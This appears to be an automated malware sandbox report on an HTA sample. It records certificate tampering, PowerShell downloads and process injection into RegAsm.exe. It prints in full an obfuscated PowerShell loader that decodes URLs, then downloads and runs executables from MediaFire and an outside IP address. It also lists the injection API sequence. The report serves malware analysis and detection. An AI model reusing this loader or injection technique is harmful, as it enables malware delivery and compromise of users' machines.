Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (6 events)

Time & API	Arguments	Status	Return
send July 31, 2024, 2:51 p.m.	buffer: tpf©ÐÈà>ª Ëë\|mÖ£k¸IöFï lD/5 ÀÀÀ À 28/ÿwww.mediafire.com socket: 1444 sent: 121	1	121
send July 31, 2024, 2:51 p.m.	buffer: FBA,)z HB]Ü^²Óà@yXâýo½¹÷,m²AÕL>b/UGTûaJê*Ö½trIo÷ÄÁ 3 S&0ÎÑ-°`q-ûÛ/îCÉ; zàS´vBÐí8ç§Ç[È?Ô"¡ÃÇw( socket: 1444 sent: 134	1	134
send July 31, 2024, 2:51 p.m.	buffer: \|/_¯8ä«nbn?¹´4÷üíiÅ8_Ú]¤=ÀÚg:Ñ,=Fï¾ðÛ#ý+Ñß¥ahÝ¨}BÑÌò;º3à8W2q'æÅÿÁÒíFÌ1Qô]ÜÑ^"CÐf¶rÕà¯z·¡-à_éß¢l:ÉÐ°VÞI¶jÍMÒË[}Qô socket: 1444 sent: 149	1	149
send July 31, 2024, 2:51 p.m.	buffer: }yf©ÐÉÿì;BòÌ4-Þ®9á²Ð0$°ÅÂEîúA/5 ÀÀÀ À 288ÿdownload2268.mediafire.com socket: 1956 sent: 130	1	130
send July 31, 2024, 2:51 p.m.	buffer: }yf©ÐÉ{Uù¤bæ·³qlÿ¼ýì4l%áß§/5 ÀÀÀ À 288ÿdownload2268.mediafire.com socket: 1956 sent: 130	1	130
send July 31, 2024, 2:51 p.m.	buffer: GET /rwrv/23.exe HTTP/1.1 Host: 94.154.172.166 Connection: Keep-Alive socket: 928 sent: 75	1	75

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2340 called NtSetContextThread to modify thread in remote process 2424
NtSetContextThread July 31, 2024, 2:51 p.m.	registers.eip: 2005598660 registers.esp: 5175544 registers.edi: 0 registers.eax: 4206198 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000000e4 process_identifier: 2424	1	0	0

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\23.exe
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\file
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Roaming\23.exe"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2340 resumed a thread in remote process 2424
NtResumeThread July 31, 2024, 2:51 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2424	1	0	0

Creates a suspicious Powershell process (2 events)

option	-executionpolicy unrestricted				value	Attempts to bypass execution policy
option	-executionpolicy unrestricted				value	Attempts to bypass execution policy

Executed a process and injected code into it, probably while unpacking (23 events)

Time & API	Arguments	Status	Return
NtResumeThread July 31, 2024, 2:51 p.m.	thread_handle: 0x00000104 suspend_count: 1 process_identifier: 884	1	0
CreateProcessInternalW July 31, 2024, 2:51 p.m.	thread_identifier: 2088 thread_handle: 0x00000314 process_identifier: 2084 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK; filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000030c	1	1
NtResumeThread July 31, 2024, 2:51 p.m.	thread_handle: 0x00000360 suspend_count: 1 process_identifier: 884	1	0
NtResumeThread July 31, 2024, 2:51 p.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 2084	1	0
NtResumeThread July 31, 2024, 2:51 p.m.	thread_handle: 0x00000300 suspend_count: 1 process_identifier: 2084	1	0
NtResumeThread July 31, 2024, 2:51 p.m.	thread_handle: 0x0000044c suspend_count: 1 process_identifier: 2084	1	0
NtResumeThread July 31, 2024, 2:51 p.m.	thread_handle: 0x00000588 suspend_count: 1 process_identifier: 2084	1	0
NtResumeThread July 31, 2024, 2:51 p.m.	thread_handle: 0x0000039c suspend_count: 1 process_identifier: 2084	1	0
NtResumeThread July 31, 2024, 2:51 p.m.	thread_handle: 0x000003b8 suspend_count: 1 process_identifier: 2084	1	0
CreateProcessInternalW July 31, 2024, 2:51 p.m.	thread_identifier: 2344 thread_handle: 0x000007e0 process_identifier: 2340 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\23.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\23.exe" filepath_r: C:\Users\test22\AppData\Roaming\23.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000007e8	1	1
NtResumeThread July 31, 2024, 2:51 p.m.	thread_handle: 0x00000804 suspend_count: 1 process_identifier: 2084	1	0
NtResumeThread July 31, 2024, 2:51 p.m.	thread_handle: 0x0000011c suspend_count: 1 process_identifier: 2340	1	0
CreateProcessInternalW July 31, 2024, 2:51 p.m.	thread_identifier: 2428 thread_handle: 0x000000e4 process_identifier: 2424 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000001ac	1	1
NtUnmapViewOfSection July 31, 2024, 2:51 p.m.	base_address: 0x00400000 region_size: 970752 process_identifier: 2424 process_handle: 0x000001ac		3221225497
NtAllocateVirtualMemory July 31, 2024, 2:51 p.m.	process_identifier: 2424 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001ac		3221225496
WriteProcessMemory July 31, 2024, 2:51 p.m.	buffer: base_address: 0x00400000 process_identifier: 2424 process_handle: 0x000001ac		0
WriteProcessMemory July 31, 2024, 2:51 p.m.	buffer: base_address: 0x00402000 process_identifier: 2424 process_handle: 0x000001ac		0
WriteProcessMemory July 31, 2024, 2:51 p.m.	buffer: base_address: 0x0044c000 process_identifier: 2424 process_handle: 0x000001ac		0
WriteProcessMemory July 31, 2024, 2:51 p.m.	buffer: base_address: 0x0044e000 process_identifier: 2424 process_handle: 0x000001ac		0
NtGetContextThread July 31, 2024, 2:51 p.m.	thread_handle: 0x000000e4	1	0
WriteProcessMemory July 31, 2024, 2:51 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2424 process_handle: 0x000001ac	1	1
NtSetContextThread July 31, 2024, 2:51 p.m.	registers.eip: 2005598660 registers.esp: 5175544 registers.edi: 0 registers.eax: 4206198 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000000e4 process_identifier: 2424	1	0
NtResumeThread July 31, 2024, 2:51 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2424	1	0

The process powershell.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Users\test22\AppData\Roaming\23.exe

3007f.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All